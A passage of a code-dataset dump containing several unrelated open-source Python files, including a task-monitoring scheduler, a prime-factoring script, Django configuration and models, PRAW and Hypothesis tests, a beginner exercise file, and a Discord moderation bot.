all_finaled_data:\n #规则 1 完成任务数 + 失败任务数 = 任务总数\n #规则 2 失败任务数 == 任务总数 发邮件报警\n if not (l_done+l_failed==l_all and d_done+d_failed==d_all and i_done+i_failed==i_all) or l_failed==l_all or d_failed==d_all:\n if source in ('Qyer', 'Daodao'):continue\n logger.info('{}, {}: {}'.format(stepa, '未完成', source))\n break\n else:\n logger.info('{}, {}: {}'.format(stepa, '已完成', source))\n status_list_len+=1\n if status_list_len>=len(task_names):\n modify_status(stepa, param, flag=False)\n logger.info('{}, 开始生成报表'.format(stepa))\n csv_file = make_poi_and_hotel_report(all_finaled_data, param)\n update_step_report(csv_file, param, 1, 0, int(step))\n logger.info('================= ' + stepa + ' ================= 完成')\n\n logger.info('================= ' + stepa + ' ================= 1')\n\ndef get_total_count(collection_name):\n client = pymongo.MongoClient(host='10.10.231.105')\n collection = client['MongoTask'][collection_name]\n total_count = collection.find({}).count()\n return total_count\n\n\ndef monitor_step3(stepa):\n step = 'step'+stepa\n tasks = getStepStatus(step)\n temp_config['db'] = 'Cityupline'\n if len(tasks) == 0:return\n for param, collection_names in tasks.items():\n collection_name, task_name = collection_names\n total_count = get_total_count(collection_name)\n if int(total_count) == 0:\n return '0%'\n\n client = pymongo.MongoClient(host='10.10.231.105')\n collection = client['MongoTask'][collection_name]\n\n success_results = collection.find({\n 'finished': 1,\n 'used_times': {'$lt': 7},\n 'task_name': task_name\n }, hint=[('task_name', 1), ('finished', 1), ('used_times', 1)])\n success_finish_num = success_results.count()\n\n failed_results = collection.find({\n 'finished': 0,\n 'used_times': 7,\n 'task_name': task_name\n }, hint=[('task_name', 1), ('finished', 1), ('used_times', 1)])\n failed_finish_num = failed_results.count()\n\n logger.info('{0}, collections: {1} total: {2} success: {3} failed: {4}'.format(step, collection_name, total_count, success_finish_num, failed_finish_num))\n if failed_finish_num>0 and failed_finish_num+success_finish_num==total_count:\n logger.info('{0}, {1} 失败'.format(step, collection_name))\n\n if success_finish_num == total_count:\n from_ota_get_city(temp_config, param)\n modify_status(step, param, flag=False)\n logger.info('{0}, {1} 成功'.format(step, collection_name))\n\n return format(success_finish_num/total_count, '.0%')\n\n\ndef local_jobs():\n # scheduler.add_job(monitor_report, 'date', args=('5',), next_run_time=datetime.datetime.now() + datetime.timedelta(seconds=2), id='test')\n # scheduler.add_job(monitor_step3,'cron',args=('3',),second='*/300',id='step3')\n scheduler.add_job(monitor_task_summary, 'cron', args=('4',), second='*/300', next_run_time=datetime.datetime.now() + datetime.timedelta(seconds=83), id='step4')\n scheduler.add_job(monitor_task_summary, 'cron', args=('9',), second='*/300', next_run_time=datetime.datetime.now() + datetime.timedelta(seconds=23), id='step9')\n scheduler.add_job(monitor_report, 'cron', args=('5',), second='*/300', id='step5')\n scheduler.add_job(monitor_task_summary, 'cron', args=('8',), second='*/300', id='step8')\n scheduler.add_job(monitor_task_summary, 'cron', args=('7',), second='*/300', id='step7')\n\n\nif __name__ == '__main__':\n local_jobs()\n scheduler.start()\n # monitor_step3('3')","repo_name":"20113261/p_m","sub_path":"call_city_project/monitor_status.py","file_name":"monitor_status.py","file_ext":"py","file_size_in_byte":9572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74580560809","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 20 20:52:15 2020\n\n@author: redne\n\"\"\"\n\nnumbers = {0: False,\n 1: False,\n 2: True}\n\nprimes = [2]\n\nnum = 3\n\ncheck_until = 5000\n\ndef checkPrime(n):\n for factor in primes:\n if (n % factor == 0):\n return False\n \n primes.append(n)\n return True\n\nwhile (num <= check_until):\n numbers[num] = checkPrime(num)\n num += 1\n \ndef getFactorization(n):\n if (n in primes):\n return {n : 1}\n factors = {}\n remaining = n\n while (remaining not in primes):\n factorFound = False\n for factor in primes:\n if (remaining % factor == 0):\n factors[factor] = factors.get(factor, 0) + 1\n remaining = int(remaining / factor)\n factorFound = True\n break\n if (not factorFound):\n raise ValueError('remaining value ({}) neither prime nor factorable in current list'.format(remaining))\n factors[remaining] = factors.get(remaining, 0) + 1\n \n return factors\n\ndef recursivelyFactor(n, *, lowerLimit = 2):\n print('now factoring: {}'.format(n))\n factors = {}\n factor = lowerLimit\n upperLimit = int(n/2)\n \n factorFound = False\n while (factor <= upperLimit):\n if (n % factor == 0):\n factors[factor] = factors.get(factor, 0) + 1\n remaining = int(n / factor)\n print(' {0} factors into {1} and {2}'.format(n, factor, remaining))\n \n subFactors = recursivelyFactor(remaining, lowerLimit = factor)\n \n for key in subFactors.keys():\n factors[key] = factors.get(key, 0) + subFactors[key]\n \n factorFound = True\n break \n factor += 1\n \n if (not factorFound):\n factors[n] = factors.get(n, 0) + 1\n #factors[remaining] = factors.get(remaining, 0) + 1 \n \n return factors\n\nprint(recursivelyFactor(12345678987654321))","repo_name":"eqkessel/PythonSandbox","sub_path":"Misc/primeFinder.py","file_name":"primeFinder.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30445534365","text":"from django.conf.urls import patterns, include, url\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^redactor/', include('redactor.urls')),\n #(r'^pages/', include('django.contrib.flatpages.urls')),\n \n url(r'^$', 'products.views.index', name='home'),\n url(r'^contact/?$', 'products.views.contact'),\n url(r'^(?P[\\w_-]+)$', 'products.views.details'),\n url(r'^q/(?P(type)?)/?(?P[\\w -]{0,100})$', 'products.views.search'),\n)\n\ntry:\n urlpatterns += patterns('', (r'^flexselect/', include('flexselect.urls')), )\nexcept ImportError:\n urlpatterns += patterns('flexselect.views', (r'field_changed', 'field_changed'), )\n\nif settings.LOCAL:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)","repo_name":"fabiopiovam/motosucata-django","sub_path":"motosucata/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"28647089068","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 19 09:57:11 2020\n\n@author: marco\n\"\"\"\nimport numpy as np\nfrom hypothesis import strategies as st\nfrom hypothesis import given, assume\nimport hypothesis.extra.numpy as xn\nimport functions\nimport configparser\n\n\nconfig = configparser.ConfigParser()\nconfig.read('inputs.txt')\n\nN = config.getint('parameters', 'N') \niterations = config.getint('parameters', 'iterations')\nnstep = config.getint('parameters', 'nstep')\nT_min = config.getfloat('parameters', 'T_min')\nT = config.getfloat('parameters', 'T')\nalpha = config.getfloat('parameters', 'alpha')\n\n\n@given(M=st.integers(2,N))\ndef test_leng_positive(M): \n '''\n Tests if the travel lenght is actually positive.\n '''\n city = functions.travel(M)\n citynum = list(range(M))\n assume(len(city[:]==len(citynum)))\n distance = functions.length(M, city, citynum)\n assert distance > 0\n \n \n@given(x=st.integers(0,N-1), y=st.integers(0,N-1), citynum=st.lists(st.integers(1, N-1),min_size=2,max_size=N,unique=True)) \ndef test_breverse(x, y, citynum): \n '''\n Checks if the block reverse move works correctly.\n '''\n assume(x != y)\n citynum1=functions.breverse(x,y, citynum)\n citynum2=functions.breverse(y,x, citynum1)\n assert citynum1 == citynum2\n\n \n@given(x=st.integers(0,N-1), y=st.integers(0,N-1), citynum=st.lists(st.integers(1, N-1),min_size=2,max_size=N,unique=True)) \ndef test_swap(x, y, citynum): \n '''\n Checks if the swap move works correctly.\n '''\n assume(x != y)\n citynum1=functions.swap(x,y, citynum)\n citynum2=functions.swap(y,x, citynum1)\n assert citynum1 == citynum2\n\n\n","repo_name":"siauling108/Simulated-annealing","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71282058729","text":"import random\n\n# ex 1\nalte_numere = [-5, 7, 2, 9, 12, 3, 1, -6, -4, 3]\nnumere_pare = []\nnumere_impare = []\nnumere_pozitive = []\nnumere_negative = []\nfor numar in alte_numere:\n if numar % 2 == 0:\n numere_pare.append(numar)\n else:\n numere_impare.append(numar)\n if numar > 0:\n numere_pozitive.append(numar)\n else:\n numere_negative.append(numar)\nprint(f'Numere pare: {numere_pare}')\nprint(f'Numere impare: {numere_impare}')\nprint(f'Numere negative: {numere_negative}')\nprint(f'Numere pozitive: {numere_pozitive}')\n# ex 2\nfor numar_mare in range(len(alte_numere)):\n for numar_mic in range(numar_mare + 1, (len(alte_numere))):\n if alte_numere[numar_mare] > alte_numere[numar_mic]:\n alte_numere[numar_mare], alte_numere[numar_mic] = alte_numere[numar_mic], alte_numere[numar_mare]\nprint(alte_numere)\n# ex 3\n# print('*' * 80)\n# numar_secret = random.randint(0, 30)\n# numar_ghicit = None\n# while numar_secret != numar_ghicit:\n# print(numar_secret)\n# numar_ghicit = int(input('Ghiceste un numar de la 1 la 30: '))\n# if numar_ghicit > numar_secret:\n# print('Nr secret e mai mic')\n# elif numar_ghicit < numar_secret:\n# print('Nr secret e mai mare')\n# print('Felicitări! Ai ghicit!')\n\n# ex 4\n# print('*' * 80)\n# numar_ales = int(input('Introdu un numar: '))\n# for randuri in range(numar_ales + 1):\n# for coloane in range(randuri):\n# print(randuri, end=' ')\n# print('') # linie noua\n\n# ex 5\nprint('*' * 80)\ntastatura_telefon = [\n[1, 2, 3],\n[4, 5, 6],\n[7, 8, 9],\n[0]\n]\nfor randuri in tastatura_telefon:\n for element in randuri:\n print(f'Cifra curentă este {element}')\n","repo_name":"MadalinaDiana/PythonWork","sub_path":"tema4_sesiune4Op.py","file_name":"tema4_sesiune4Op.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70358156009","text":"import pickle\n\nimport pytest\n\nfrom praw.models import LiveThread, LiveUpdate, Redditor\nfrom praw.models.reddit.live import (\n LiveContributorRelationship,\n LiveThreadContribution,\n LiveUpdateContribution,\n)\n\nfrom ... import UnitTest\n\n\nclass TestLiveThread(UnitTest):\n def test_construct_failure(self, reddit):\n message = \"Either 'id' or '_data' must be provided.\"\n with pytest.raises(TypeError) as excinfo:\n LiveThread(reddit)\n assert str(excinfo.value) == message\n\n with pytest.raises(TypeError) as excinfo:\n LiveThread(reddit, id=\"dummy\", _data={\"id\": \"dummy\"})\n assert str(excinfo.value) == message\n\n with pytest.raises(ValueError):\n LiveThread(reddit, \"\")\n\n def test_construct_success(self, reddit):\n thread_id = \"ukaeu1ik4sw5\"\n data = {\"id\": thread_id}\n\n thread = LiveThread(reddit, thread_id)\n assert isinstance(thread, LiveThread)\n assert thread.id == thread_id\n\n thread = LiveThread(reddit, _data=data)\n assert isinstance(thread, LiveThread)\n assert thread.id == thread_id\n\n def test_contrib(self, reddit):\n thread_id = \"ukaeu1ik4sw5\"\n thread = LiveThread(reddit, thread_id)\n assert isinstance(thread.contrib, LiveThreadContribution)\n\n def test_contributor(self, reddit):\n thread_id = \"ukaeu1ik4sw5\"\n thread = LiveThread(reddit, thread_id)\n assert isinstance(thread.contributor, LiveContributorRelationship)\n\n def test_equality(self, reddit):\n thread1 = LiveThread(reddit, id=\"dummy1\")\n thread2 = LiveThread(reddit, id=\"Dummy1\")\n thread3 = LiveThread(reddit, id=\"dummy3\")\n assert thread1 == thread1\n assert thread2 == thread2\n assert thread3 == thread3\n assert thread1 != thread2 # live thread ID in a URL is case sensitive\n assert thread2 != thread3\n assert thread1 != thread3\n assert \"dummy1\" == thread1\n assert thread2 != \"dummy1\"\n assert thread2 == \"Dummy1\"\n\n def test_getitem(self, reddit):\n thread_id = \"dummy_thread_id\"\n update_id = \"dummy_update_id\"\n thread = LiveThread(reddit, id=thread_id)\n update = thread[update_id]\n assert isinstance(update, LiveUpdate)\n assert update.id == update_id\n\n def test_hash(self, reddit):\n thread1 = LiveThread(reddit, id=\"dummy1\")\n thread2 = LiveThread(reddit, id=\"Dummy1\")\n thread3 = LiveThread(reddit, id=\"dummy3\")\n assert hash(thread1) == hash(thread1)\n assert hash(thread2) == hash(thread2)\n assert hash(thread3) == hash(thread3)\n assert hash(thread1) != hash(thread2)\n assert hash(thread2) != hash(thread3)\n assert hash(thread1) != hash(thread3)\n\n def test_pickle(self, reddit):\n thread = LiveThread(reddit, id=\"dummy\")\n for level in range(pickle.HIGHEST_PROTOCOL + 1):\n other = pickle.loads(pickle.dumps(thread, protocol=level))\n assert thread == other\n\n def test_repr(self, reddit):\n thread = LiveThread(reddit, id=\"dummy\")\n assert repr(thread) == \"LiveThread(id='dummy')\"\n\n def test_str(self, reddit):\n thread = LiveThread(reddit, id=\"dummy\")\n assert str(thread) == \"dummy\"\n\n\nclass TestLiveThreadContribution(UnitTest):\n def test_update__no_args(self, reddit):\n thread = LiveThread(reddit, \"xyu8kmjvfrww\")\n assert thread.contrib.update() is None\n\n\nclass TestLiveUpdate(UnitTest):\n def test_construct_failure(self, reddit):\n message = \"Either 'thread_id' and 'update_id', or '_data' must be provided.\"\n thread_id = \"dummy_thread_id\"\n update_id = \"dummy_update_id\"\n\n with pytest.raises(TypeError) as excinfo:\n LiveUpdate(reddit)\n assert str(excinfo.value) == message\n\n with pytest.raises(TypeError) as excinfo:\n LiveUpdate(reddit, thread_id=thread_id)\n assert str(excinfo.value) == message\n\n with pytest.raises(TypeError) as excinfo:\n LiveUpdate(reddit, update_id=update_id)\n assert str(excinfo.value) == message\n\n def test_construct_success(self, reddit):\n thread_id = \"dummy_thread_id\"\n update_id = \"dummy_update_id\"\n data = {\"id\": update_id}\n\n update = LiveUpdate(reddit, thread_id=thread_id, update_id=update_id)\n assert isinstance(update, LiveUpdate)\n assert update.id == update_id\n assert isinstance(update.thread, LiveThread)\n assert update.thread.id == thread_id\n\n update = LiveUpdate(reddit, thread_id, update_id)\n assert isinstance(update, LiveUpdate)\n assert update.id == update_id\n assert isinstance(update.thread, LiveThread)\n assert update.thread.id == thread_id\n\n update = LiveUpdate(reddit, _data=data)\n assert isinstance(update, LiveUpdate)\n assert update.id == update_id\n assert update._fetched\n\n def test_contrib(self, reddit):\n thread_id = \"dummy_thread_id\"\n update_id = \"dummy_update_id\"\n update = LiveUpdate(reddit, thread_id, update_id)\n assert isinstance(update.contrib, LiveUpdateContribution)\n\n data = {\"id\": \"dummy_update_id\", \"author\": \"dummy_author\"}\n update = LiveUpdate(reddit, _data=data)\n assert isinstance(update.contrib, LiveUpdateContribution)\n\n def test_setattr(self, reddit):\n data = {\"id\": \"dummy_update_id\", \"author\": \"dummy_author\"}\n update = LiveUpdate(reddit, _data=data)\n assert isinstance(update.author, Redditor)\n\n def test_thread(self, reddit):\n thread_id = \"dummy_thread_id\"\n update_id = \"dummy_update_id\"\n\n update = LiveUpdate(reddit, thread_id=thread_id, update_id=update_id)\n assert isinstance(update.thread, LiveThread)\n assert update.thread.id == thread_id\n","repo_name":"praw-dev/praw","sub_path":"tests/unit/models/reddit/test_live.py","file_name":"test_live.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":3211,"dataset":"github-code","pt":"53"} +{"seq_id":"26373640949","text":"# -*- coding: utf-8 -*-\n\n# A lire si vous faîtes une mise à jour et si vous avez ajouté ou modifié les commandes du bot :\n# 1) Copiez vos commandes (pas les commandes par défaut) que vous avez créer dans votre ancienne version dans la nouvelle version.\n# 2) Si vous avez modifié une commande de NextBot par défaut, supprimez la commande de la nouvelle version puis copiez le code de la commande de l'ancienne version dans la nouvelle version.\n\nimport asyncio, discord, os\n\nuser_bot = \"LouveBot\" # Mettez dans cette variable le pseudo du bot.\ntoken = os.environ['BOT_TOKEN'] # Mettez dans cette variable le token du bot\ntrust = os.environ['TRUST_USER'].split(',') # admins du bot\nranks = False\ntry:\n f = open('streamers.txt', 'r', encoding='utf-8')\nexcept IOError:\n f = open('streamers.txt', 'w', encoding='utf-8')\nstreamers = f.read().split(\"\\n\")\nf.close()\n\nclient = discord.Client()\nver = \"1.0.0\"\nlang = \"fr\"\n\nprint(\"LouveBot \" + ver + \" \" + lang)\n\n\n@client.event\n@asyncio.coroutine\ndef on_member_update(before, after):\n streamChannel = [chan for chan in after.server.channels if chan.id == \"405352007302643712\"][0]\n if after.game is not None and after.game.url is not None:\n if '#' + str(after).split('#')[1] in streamers and 'twitch.tv' in after.game.url:\n yield from client.send_message(streamChannel, str(after).split('#')[0] + ' est en live GOGOGOGO :\\n' + str(\n after.game) + ' ' + after.game.url)\n\n\n@client.event\n@asyncio.coroutine\ndef on_message(message):\n rep = text = msg = message.content\n rep2 = text2 = msg2 = rep.split()\n user = str(message.author)\n trusted = user in trust\n try:\n memberList = ['#' + member.discriminator for member in message.server.members]\n server_msg = str(message.channel.server)\n chan_msg = str(message.channel.name)\n membersName = [str(member.name) + '#' + str(member.discriminator) for member in message.server.members]\n pm = False\n except AttributeError:\n server_msg = user\n chan_msg = user\n pm = True\n try:\n command = rep2[0].lower()\n params = rep2[0:]\n except IndexError:\n command = \"\"\n params = \"\"\n\n print(user + \" (\" + server_msg + \") [\" + chan_msg + \"] : \" + rep)\n\n if ranks and not pm:\n open(\"msgs_user_\" + server_msg + \".txt\", \"a\").close()\n msgs = open(\"msgs_user_\" + server_msg + \".txt\", \"r\")\n msgs_r = msgs.read()\n if user not in msgs_r:\n msgs_w = open(\"msgs_user_\" + server_msg + \".txt\", \"a\")\n msgs_w.write(user + \":0\\n\")\n msgs_w.close()\n msgs.close()\n msgs = open(\"msgs_user_\" + server_msg + \".txt\", \"r\")\n msgs_r = msgs.read()\n msgs_user = msgs_r.split(user + \":\")[1]\n msgs.close()\n user_msgs_n = int(msgs_user.split(\"\\n\")[0])\n user_msgs_n += 1\n msgs_r = msgs_r.replace(user + \":\" + str(user_msgs_n - 1), user + \":\" + str(user_msgs_n))\n msgs = open(\"msgs_user_\" + server_msg + \".txt\", \"w\")\n msgs.write(msgs_r)\n msgs.close()\n\n # Début des commandes\n\n if command == \"!members_list\":\n yield from client.send_message(message.channel, '\\n'.join(membersName))\n\n if command == \"!test\":\n yield from client.send_message(message.channel, user)\n yield from client.send_message(message.channel, trust)\n\n if command == \"!whereami\":\n yield from client.send_message(message.channel, message.server)\n yield from client.send_message(message.channel, message.channel.id)\n\n if command == \"!commandtest\": # Copiez ce code pour créer une commande\n yield from client.send_message(message.channel, \"Texte à envoyer.\")\n\n if command == \"!saymyname\": # Copiez ce code pour créer une commande\n yield from client.send_message(message.channel, user)\n\n if command == \"!ban\" and trusted and not pm: # Cette commande sert à bannir un utilisateur, and trusted veux dire que la commande est restreinte et que seuls les utilisateurs en trust peuvent utiliser la commande et and not pm veux dire que la commande n'est pas utilisable en PM.\n id_user = message.server.get_member_named(params[\n 1]) # La variable params[1] est le premier paramètre entré par l'utilisateur, cette ligne sert à donner l'identifiant de l'utilisateur à partir du pseudo. Pour avoir l'identifiant d'un utilisateur, un serveur ou d'autre chose, vous devez activer le mode développeur\n try:\n yield from client.ban(id_user, int(params[\n 2])) # cette ligne sert à bannir l'utilisateur grâce à la variable id_user qui représente l'identifiant de l'utilisateur à bannir\n except IndexError: # si le nombre de messages à supprimer n'est pas mis (en tapant juste !ban utilisateur), le bot bannira l'utilisateur mais ne supprimera aucun message\n yield from client.ban(id_user, 0)\n\n if command == \"!google\": # Voir la commande !bing\n yield from client.send_message(message.channel, \"https://www.google.com/#q=\" + \"+\".join(params[1:]))\n\n if command == \"!kick\" and trusted and not pm: # Voir la commande !ban\n id_user = message.server.get_member_named(params[1])\n yield from client.kick(id_user)\n\n if (\n command == \"!purge\" or command == \"!clear\") and trusted and not pm: # Cette commande sert à effacer les messages, en tapant !purge 10, le bot supprimera les 10 derniers messages.\n yield from client.purge_from(message.channel, limit=int(params[\n 1])) # Cette ligne sert à supprimer les messages avec params[1] qui est le premier paramètre (le nombre de messages), il y a int(params[1]) car le paramètre doit être converti en un nombre.\n\n if (command == \"!quit\" or command == \"!exit\") and trusted: # Cette commande sert à fermer le bot\n yield from client.close()\n\n if command == \"!role_user_add\" and trusted and not pm: # Cette commande sert à ajouter un rôle à un utilisateur\n member = message.server.get_member_named(params[1])\n role = discord.utils.get(message.server.roles, name=\" \".join(params[\n 2:])) # cette ligne sert à récupérer le rôle de l'utilisateur à ajouter, \" \".join(params[2:]) est le nom du rôle\n yield from client.add_roles(member,\n role) # cette ligne sert à appliquer l'ajout du rôle à l'utilisateur et member est l'identifiant de l'utilisateur et role est l'identifiant du rôle\n\n if command == \"!role_user_remove\" and trusted and not pm: # Cette commande sert à retirer un rôle à un utilisateur\n member = message.server.get_member_named(params[1])\n role = discord.utils.get(message.server.roles, name=\" \".join(params[2:]))\n yield from client.remove_roles(member,\n role) # cette ligne sert à retirer le rôle d'un utilisateur, son fonctionnement est quasi-identique à part qu'elle fait l'inverse (elle retire le rôle au lieu de l'ajouter)\n\n if command == \"!roles\" and trusted and not pm: # Cette commande sert à lister les rôles sur le serveur\n for role in message.server.roles: # cette ligne est une boucle et sert à mettre dans la variable role la liste des rôles du serveur avec message.server.roles\n yield from client.send_message(message.channel, role.id + \" : \" + role.name)\n\n if command == \"!unban\" and trusted and not pm: # Cette commande sert à débannir un utilisateur\n id_user = message.server.get_member_named(params[1])\n yield from client.unban(message.server,\n id_user) # pour débannir un utilisateur, il faut l'identifiant du serveur avec message.serveur et l'identifiant de l'utilisateur (voir !ban)\n\n if command == \"!say\" and trusted: # Cette commande sert à envoyer un message sur un channel du serveur, le paramètre 1 doit être l'identifiant du channel et après, on doit mettre le message (exemple : !say 1234567890 Bonjour !)\n yield from client.send_message(client.get_channel(params[1]), \" \".join(params[2:]))\n\n if command == \"!say_user\" and trusted:\n if params[2].lower() == params[2].upper():\n yield from client.send_message(client.get_server(params[1]).get_member(params[2]), \" \".join(params[3:]))\n else:\n yield from client.send_message(client.get_server(params[1]).get_member_named(params[2]),\n \" \".join(params[3:]))\n\n if command == \"!ver\": # Cette commande envoit la version du bot.\n yield from client.send_message(message.channel, \"NextBot \" + ver + \" \" + lang)\n\n if command == \"!streamadd\" and trusted:\n if len(params) == 1:\n yield from client.send_message(message.channel, \"utilisation: !streamadd + #usertag\")\n for userToAdd in params[1:]:\n if userToAdd not in streamers and userToAdd in memberList:\n f2 = open('streamers.txt', 'a', encoding='utf-8')\n f2.write(userToAdd + \"\\n\")\n f2.close()\n streamers.append(userToAdd)\n yield from client.send_message(message.channel,\n userToAdd + \" a bien été ajouté a la liste des streams a afficher\")\n elif userToAdd in memberList:\n yield from client.send_message(message.channel,\n userToAdd + \" fais déjàs partie de la liste des streams a afficher\")\n else:\n yield from client.send_message(message.channel, \"Erreur dans le nom d'utilisateur\")\n\n if command == \"!streamrm\" and trusted:\n if len(params) == 1:\n yield from client.send_message(message.channel, \"utilisation: !streamrm + usertag\")\n for userToRm in params[1:]:\n if userToRm in streamers:\n newStreamList = [user for user in streamers if userToRm != user]\n f2 = open('streamers.txt', 'r+', encoding='utf-8')\n f2.truncate()\n f2.write(\"\\n\".join(newStreamList))\n f2.close()\n streamers.clear()\n for s in newStreamList:\n streamers.append(s)\n yield from client.send_message(message.channel,\n userToRm + \" a bien été supprimé a la liste des streams a afficher\")\n else:\n yield from client.send_message(message.channel, \"Erreur dans le nom d'utilisateur\")\n\n\n# Fin des commandes\n\nclient.run(token)\n","repo_name":"misteurLeu/discordBotu","sub_path":"NextBot 1.0.0.py","file_name":"NextBot 1.0.0.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34484924444","text":"import logging\nimport dateutil.parser\nimport re\nimport json\nimport mappyfile\n\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.utils.translation import gettext as _\nfrom django.contrib.postgres.fields import JSONField, ArrayField\n\n\n# from compositefk.fields import CompositeOneToOneField\n\nfrom translation.models import Translation\n\n\n\n# import reversion\n# Create your models here.\nlogger = logging.getLogger('default')\n\ndef validate_iso8601(value):\n try:\n parsed = dateutil.parser.parse(value)\n except Exception as e:\n raise ValidationError(e)\n return parsed\n\ndef validate_iso8601duration(value):\n # regex to validate iso 8601 duration is borrowed from\n # here: https://stackoverflow.com/a/32045167\n durex = re.compile(r\"^P(?!$)(\\d+(?:\\.\\d+)?Y)?(\\d+(?:\\.\\d+)?M)?(\\d+(?:\\.\\d+)?W)?(\\d+(?:\\.\\d+)?D)?(T(?=\\d)(\\d+(?:\\.\\d+)?H)?(\\d+(?:\\.\\d+)?M)?(\\d+(?:\\.\\d+)?S)?)?$\")\n match = durex.match(value)\n # print(value,match)\n if match:\n return value\n else:\n raise ValidationError(\n _('%(value)s is not a valid ISO 8601 duration'),\n params={'value': value}\n )\n\ndef validate_timing(value):\n if value == 'current':\n return\n \n parts = value.split(',')\n for part in parts:\n if '/' in part:\n try:\n _start,_end,_res = part.split('/')\n except ValueError as e:\n raise ValidationError(e)\n validate_iso8601(_start)\n validate_iso8601(_end)\n validate_iso8601duration(_res)\n elif part:\n validate_iso8601(part)\n else:\n # happens e.g. with trailing comma\n raise ValidationError(\n _('Empty string, maybe you have a trailing comma?')\n )\n\n\nclass Dataset(models.Model):\n\n created = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n name = models.CharField(max_length=512, unique=True, db_index=True)\n\n description = models.ForeignKey(\n 'translation.Translation',\n verbose_name=_('description'),\n on_delete=models.SET_NULL,\n related_name='dataset_description',\n null=True\n )\n\n short_description = models.OneToOneField(\n 'translation.Translation',\n verbose_name=_('short_description'),\n on_delete=models.SET_NULL,\n related_name='dataset_short_description',\n null=True\n )\n\n abstract = models.OneToOneField(\n 'translation.Translation',\n verbose_name=_('abstract'),\n on_delete=models.SET_NULL,\n related_name='dataset_abstract',\n null=True\n )\n\n chargeable = models.BooleanField(default=False)\n timing = models.CharField(max_length=256, help_text=\"\"\"Timing can have one of \n the following formats: \n
current | TT | TT,TT,TT | TT/TT/RES
\n where TT is a valid ISO 8601 timestamp (e.g. 2015-05-12T13:54:01Z), \n and RES is the resolution in the form P[n]Y[n]M[n]DT[n]H[n]M[n]S \n (e.g. P1Y). Examples\n
2008,2011,2012
\n
2005-11-01T10:15Z/2019-02-15T09:30Z/PT5M
\n \"\"\", \n default='current',\n validators=[validate_timing])\n\n DATATYPE_RASTER = 'raster'\n DATATYPE_POINT = 'point'\n DATATYPE_POLYGON = 'polygon'\n DATATYPE_CHOICES = (\n (DATATYPE_RASTER, 'raster'),\n (DATATYPE_POINT, 'point'),\n (DATATYPE_POLYGON, 'polygon')\n )\n datatype = models.CharField(\n max_length=32,\n choices=DATATYPE_CHOICES,\n default='polygon',\n db_index=True\n )\n\n srs = models.ForeignKey(\n 'geo.SRS',\n on_delete=models.SET_NULL,\n null=True\n )\n\n # Todo: Make this FK to db model which is synced with\n # actual DB\n db_name = models.CharField(max_length=64, null=True)\n\n def __str__(self):\n return self.name\n\n\nclass Metadata(models.Model):\n\n dataset = models.OneToOneField('layers.Dataset', on_delete=models.CASCADE)\n url_infos = models.URLField(max_length=1024, null=True, blank=True)\n url_download = models.URLField(max_length=1024, null=True, blank=True)\n url_portal = models.URLField(max_length=1024, null=True, blank=True)\n\n\nclass Tileset(models.Model):\n\n # TODO LEGACY_CLEANUP: once legacy sync is dropped, add\n # auto_now_add=True and auto_now=True respectively\n created = models.DateTimeField(default=timezone.now)\n modified = models.DateTimeField(default=timezone.now)\n dataset = models.ForeignKey('layers.Dataset', on_delete=models.CASCADE)\n\n FORMAT_PNG = 'png'\n FORMAT_JPEG = 'jpeg'\n FORMAT_CHOICES = (\n (FORMAT_PNG, 'png'),\n (FORMAT_JPEG, 'jpeg')\n )\n image_type = models.CharField(max_length=10, choices=FORMAT_CHOICES, default=FORMAT_PNG)\n timestamp = models.DateTimeField(default=timezone.now)\n cache_ttl = models.PositiveIntegerField(default=1800, help_text=\"Cache 'time to live'\")\n resolution_min = models.DecimalField(max_digits=7, decimal_places=2, default=4000.0)\n resolution_max = models.DecimalField(max_digits=7, decimal_places=2, default=0.25)\n published = models.BooleanField(default=False, help_text=\"Publication in GetCapabilities\")\n publication_service = models.ForeignKey('publication.WMTS', null=True, blank=True, on_delete=models.SET_NULL)\n\n\nclass MapServerGroup(models.Model):\n dataset = models.ForeignKey('layers.Dataset', on_delete=models.CASCADE)\n mapserver_group_name = models.CharField(max_length=512, null=True, blank=True)\n publication_services = models.ManyToManyField('publication.WMS')\n\n @property\n def name(self):\n return self.mapserver_group_name or self.dataset.name\n\n\nclass VersionedManager(models.Manager):\n # Setting use_for_related_fields to True on the manager will make it\n # available on all relations that point to the model on which you defined\n # this manager as the default manager.\n use_for_related_fields = True\n\n def get_queryset(self):\n return super().get_queryset().filter(current=True)\n\n\n\nclass MapServerLayerManager(models.Manager):\n\n def get_queryset(self):\n return super().get_queryset().prefetch_related('group','group__dataset')\n\n\nclass ExtentField(ArrayField):\n\n def __init__(self, epsg=2056, *args, **kwargs):\n self.epsg = epsg\n # We need four coordinates\n kwargs['size'] = 4\n # Note: we have to pass the base_field as kwargs param\n # and NOT as args param, __init__ is called repeately\n # for ArrayField, the args base_field param is transformed\n # to a kwargs param after the first iteration and results in a\n # \"got multiple values for argument 'base_field'\" error at the\n # second call\n kwargs['base_field'] = models.IntegerField()\n super().__init__(*args, **kwargs)\n\n def to_python(self, value):\n extent = super().to_python(value)\n\n if self.epsg == 